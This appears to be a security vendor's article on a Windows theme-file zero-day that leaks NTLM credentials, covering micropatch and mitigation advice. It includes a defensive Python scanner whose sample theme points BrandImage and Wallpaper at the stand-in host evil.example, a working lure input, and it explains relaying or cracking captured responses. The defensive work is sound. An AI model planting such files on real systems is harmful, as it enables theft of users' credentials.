Newly Discovered Zero-Day Vulnerability in Windows Themes Files Exposes NTLM Credentials
A newly discovered zero-day vulnerability in Windows theme (.theme) files exposes users’ NTLM (NT LAN Manager) credentials. The flaw enables remote credential theft: an attacker needs nothing more than for a user to view a malicious theme file in Windows Explorer. Researchers at ACROS Security, the company behind the 0patch service, reported the issue, underscoring the ongoing risks of NTLM-related exploits.
New Bypass Detected by ACROS Security
Earlier this year, Microsoft patched an NTLM leak in theme files, tracked as CVE-2024-21320. Akamai researcher Tomer Peled then found that the patch could be bypassed, which led to a second vulnerability, CVE-2024-38030, and a second fix. ACROS Security subsequently found that the problem persists after that fix: a malicious theme file can still make Windows initiate NTLM authentication to a remote host, handing the attacker the user’s NTLMv2 challenge-response, with no user interaction beyond the file being displayed in Explorer. The file does not need to be opened or applied, which makes the threat particularly insidious.
ACROS Security has confirmed that this vulnerability affects fully updated Windows systems, including the latest Windows 11 24H2. Pending an official fix from Microsoft, ACROS Security has released a temporary micropatch through its 0patch service. The vulnerability affects both legacy and currently supported Windows Workstation versions, so the exposure is widespread.
How the Zero-Day Attack Works
The mechanics of the attack are straightforward. A .theme file is a plain INI-style text file, and properties such as BrandImage (in the [Theme] section) and Wallpaper (in the [Control Panel\Desktop] section) hold file paths, which may be network paths. When a user merely views such a file in Windows Explorer, Explorer parses it and resolves those paths; if a path points at a remote host, Windows automatically attempts NTLM authentication to that host over SMB. The leak is not limited to one Windows version; it affects everything from Windows 7 to Windows 11 24H2.
An attacker who captures the NTLMv2 response can relay it to another service on the network (NTLM relay) or crack it offline to recover the user’s password. Note that a captured NTLMv2 response is not usable for pass-the-hash, which needs the NT hash itself, so relay and cracking are the realistic follow-ons; either one supports lateral movement and unauthorized access to sensitive systems. Independently of any specific bypass, blocking outbound SMB (TCP 445) at the network perimeter and restricting outgoing NTLM through Group Policy (“Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers”) limit the damage from this whole class of leak. Keep in mind that if the WebClient service is running, Windows can fall back to WebDAV when SMB is blocked, so the perimeter rule alone is not sufficient.
ACROS Security’s temporary micropatch addresses this by making Windows correctly recognize network paths in theme file properties, so the remote lookup, and with it the NTLM authentication, never happens. It is the only fix currently available for users exposed to this exploit.
How the Micropatch Works
ACROS Security’s micropatch mitigates the NTLM credential leak caused by malicious theme files. It targets the code paths in Windows Explorer that would otherwise trigger a network request to the attacker’s machine when a compromised theme file is viewed.
The micropatch works by correctly identifying network paths in theme files and refusing to follow them. ACROS demonstrated the vulnerability in a YouTube video using two fully updated Windows 11 24H2 computers. The first PC created a malicious theme file and sent it to the second, unpatched PC. As soon as the file was copied to the unpatched PC’s desktop, Windows initiated a network connection and sent the user’s NTLM credentials to the attacker’s machine without any further user action.
However, with the 0patch micropatch installed, the same file transfer did not result in a connection. Instead, the micropatch successfully recognized and blocked the network path within the theme file, ensuring that no credentials were compromised. This demonstration highlights the effectiveness of 0patch’s solution, showcasing how their real-time, targeted patch can mitigate vulnerabilities even before an official fix is released by Microsoft.
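The check the micropatch performs inside Explorer can also be applied to the theme file itself, before a user ever lists it in a folder. The scanner below is an added example, not 0patch’s or Microsoft’s code: it parses a .theme file’s INI sections and flags any property whose value is a network path, which covers the BrandImage and Wallpaper properties described above and any other path-valued key. The sample theme text and the host `evil.example` are constructed for the example, and the set of path forms it recognizes (plain UNC, extended-length `\\?\UNC\`, forward-slash UNC, and `file://host` URLs) is my assumption about what would trigger a remote lookup, not a list taken from the source.

```python
"""Scan Windows .theme files for properties that point at a remote host.

Added example (not 0patch's or Microsoft's code). A .theme file is INI text,
so the scanner parses it with configparser and applies a network-path check
to every value. The sample theme and the host evil.example are constructed.
"""
import configparser
import re
from pathlib import Path
from typing import List, Tuple

# Path forms that make Windows contact another host (assumption: this covers
# the common spellings; it is not a list from the source):
#   \\host\share\...      plain UNC
#   \\?\UNC\host\share    extended-length UNC
#   //host/share/...      forward-slash UNC
#   file://host/share     file URL with a host component
# Excluded on purpose: \\?\C:\... (extended-length local), \\.\device
# (device namespace) and file:///C:/... (local file URL).
_REMOTE = re.compile(
    r"""^\s*
        (?:file:)?            # optional file: scheme
        [\\/]{2}              # two leading separators
        (?:
            \?[\\/]UNC[\\/]   # \\?\UNC\host\share
          | (?![?./\\\s])     # \\host... or //host..., but not \\?\, \\.\, file:///
        )
    """,
    re.IGNORECASE | re.VERBOSE,
)


def is_network_path(value: str) -> bool:
    """True if resolving `value` would make Windows talk to a remote host."""
    return _REMOTE.match(value) is not None


def scan_theme(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every theme property holding a network path.

    Every key in every section is checked, not only BrandImage and Wallpaper,
    so other path-valued properties (e.g. Slideshow ImagesRootPath) are covered.
    """
    parser = configparser.ConfigParser(
        interpolation=None,      # values contain % and \ that must stay literal
        delimiters=("=",),
        strict=False,            # tolerate duplicate keys in hand-made files
        allow_no_value=True,
    )
    parser.optionxform = str     # keep the file's key capitalisation in the report
    parser.read_string(text)
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if value is not None and is_network_path(value):
                findings.append((section, key, value))
    return findings


def read_theme_file(path: str) -> str:
    """Read a .theme file; files saved by Windows are frequently UTF-16 with a BOM."""
    raw = Path(path).read_bytes()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")


# Constructed sample: two remote references (one plain UNC, one \\?\UNC form)
# among ordinary local values.
SAMPLE_THEME = r"""
; Constructed sample for this example, not a real theme file.
[Theme]
DisplayName=Quarterly Report
BrandImage=\\evil.example\share\brand.png

[Control Panel\Desktop]
Wallpaper=\\?\UNC\evil.example\share\wall.jpg
TileWallpaper=0
WallpaperStyle=10

[Slideshow]
ImagesRootPath=C:\Users\Public\Pictures

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=DABJDKT
"""

if __name__ == "__main__":
    for section, key, value in scan_theme(SAMPLE_THEME):
        print(f"[{section}] {key} -> {value}")
```

Run it against a real file with `scan_theme(read_theme_file("suspect.theme"))`. The scanner is a triage aid for a mail gateway, a file-share audit or an incident responder, not a substitute for the micropatch: it does not expand environment variables, does not unpack .themepack/.deskthemepack archives (CAB files that contain a .theme), and only recognizes the path forms listed above.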
Stay Ahead with SOCRadar’s Vulnerability Intelligence
As new vulnerabilities continue to emerge, proactive measures are essential for securing your organization’s digital environment. SOCRadar’s Vulnerability Intelligence provides the necessary tools to stay ahead of potential threats. This feature assists organizations in identifying and prioritizing critical vulnerabilities before attackers can exploit them, offering real-time alerts and detailed, actionable insights.
By focusing resources on the most critical vulnerabilities, SOCRadar enables faster patching and helps maintain robust security. With SOCRadar, organizations can remain one step ahead, protecting themselves from the latest threats.
Conclusion
The recently discovered zero-day vulnerability in Windows Themes files is a stark reminder of the risks of legacy authentication methods like NTLM. Microsoft’s fix for this bug class has now been bypassed twice, which argues against relying on a single patch: organizations and individual Windows users should apply ACROS Security’s temporary micropatch, stay informed about Microsoft’s official patch release, and reduce exposure in the meantime by blocking outbound SMB at the perimeter and restricting outgoing NTLM where their environment allows it.
In an era where cyber threats are ever-evolving, vigilance and proactive security measures are paramount. By staying informed and prepared, users can better protect themselves against the growing landscape of cyber threats.